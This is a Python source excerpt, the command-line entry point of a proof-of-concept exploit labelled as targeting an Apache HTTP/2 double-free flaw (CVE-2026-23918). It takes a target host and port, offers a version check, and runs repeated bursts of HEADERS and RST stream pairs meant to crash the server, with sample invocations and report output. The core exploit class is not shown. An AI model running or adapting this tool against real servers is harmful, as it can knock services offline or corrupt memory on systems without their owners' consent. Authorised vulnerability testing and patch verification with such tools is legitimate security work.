    """Command-line entry point.

    Parses the options, warns about missing optional packages, then either
    prints the result of a version check (``--check-only``) or runs the
    full test and optionally writes the JSON and Markdown outputs.

    Returns:
        Exit status: 1 when the check reports the target as vulnerable or
        the run flags a crash, otherwise 0.
    """
    cli = argparse.ArgumentParser(
        description="CVE-2026-23918 PoC - Apache HTTP/2 Double Free",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=textwrap.dedent("""\
            Examples:
              %(prog)s -t 192.168.1.100 -p 443
              %(prog)s -t example.com -p 443 -n 20 -b 500
              %(prog)s -t example.com --mode staged -n 10
              %(prog)s -t 10.0.0.1 --no-tls -p 80
              %(prog)s -t target.com --check-only
              %(prog)s -t target.com -o results.json --report exploit_report.md
        """),
    )

    option = cli.add_argument
    option("-t", "--target", required=True,
           help="Target hostname or IP address")
    option("-p", "--port", type=int, default=443,
           help="Target port (default: 443)")
    option("--no-tls", action="store_true",
           help="Use cleartext h2c instead of TLS h2")
    option("-n", "--iterations", type=int, default=10,
           help="Number of exploit iterations (default: 10)")
    option("-b", "--burst", type=int, default=200,
           help="HEADERS+RST pairs per iteration (default: 200)")
    option("-d", "--delay", type=float, default=0.3,
           help="Delay between iterations in seconds (default: 0.3)")
    option("-m", "--mode", choices=["inline", "staged"],
           default="inline",
           help="Attack mode: inline (default) sends HEADERS+RST together; "
                "staged opens all streams then resets all")
    option("--timeout", type=float, default=10.0,
           help="Connection timeout (default: 10)")
    option("-v", "--verbose", action="store_true",
           help="Verbose output")
    option("--check-only", action="store_true",
           help="Only check version, don't exploit")
    option("-o", "--output",
           help="Save results to JSON file")
    option("--report",
           help="Generate detailed markdown report to file")

    opts = cli.parse_args()

    # Port 80 forces cleartext even without --no-tls.
    tls_enabled = not (opts.no_tls or opts.port == 80)

    if not HAS_REQUESTS:
        print("[!] 'requests' library not available - version detection limited")
        print("[!] Install: pip install requests")

    if not HAS_HPACK:
        print("[!] 'hpack' library not available - HPACK encoding may fail")
        print("[!] Install: pip install hpack")

    runner = CVE202623918(
        target=opts.target,
        port=opts.port,
        use_tls=tls_enabled,
        timeout=opts.timeout,
        verbose=opts.verbose,
    )

    if opts.check_only:
        verdict = runner.check()
        print(f"\n  Target:    {opts.target}:{opts.port}")
        print(f"  Version:   {verdict['version']}")
        print(f"  Server:    {verdict['server']}")
        print(f"  HTTP/2:    {'Yes' if verdict['http2_support'] else 'No/Unknown'}")
        print(f"  Status:    {'VULNERABLE' if verdict['vulnerable'] else 'NOT VULNERABLE / UNKNOWN'}")
        print(f"  Reason:    {verdict['reason']}")
        if verdict["vulnerable"]:
            return 1
        return 0

    outcome = runner.execute(
        iterations=opts.iterations,
        burst_size=opts.burst,
        delay=opts.delay,
        mode=opts.mode,
    )

    if opts.output:
        with open(opts.output, "w", encoding="utf-8") as sink:
            json.dump(outcome, sink, indent=2, default=str)
        print(f"\n[+] JSON results saved to {opts.output}")

    if opts.report:
        generate_report(outcome, opts.report)
        print(f"[+] Markdown report saved to {opts.report}")

    if outcome["crash_confirmed"]:
        return 1
    return 0


# Run the CLI only when executed as a script; main()'s return value becomes
# the process exit status.
if __name__ == "__main__":
    sys.exit(main())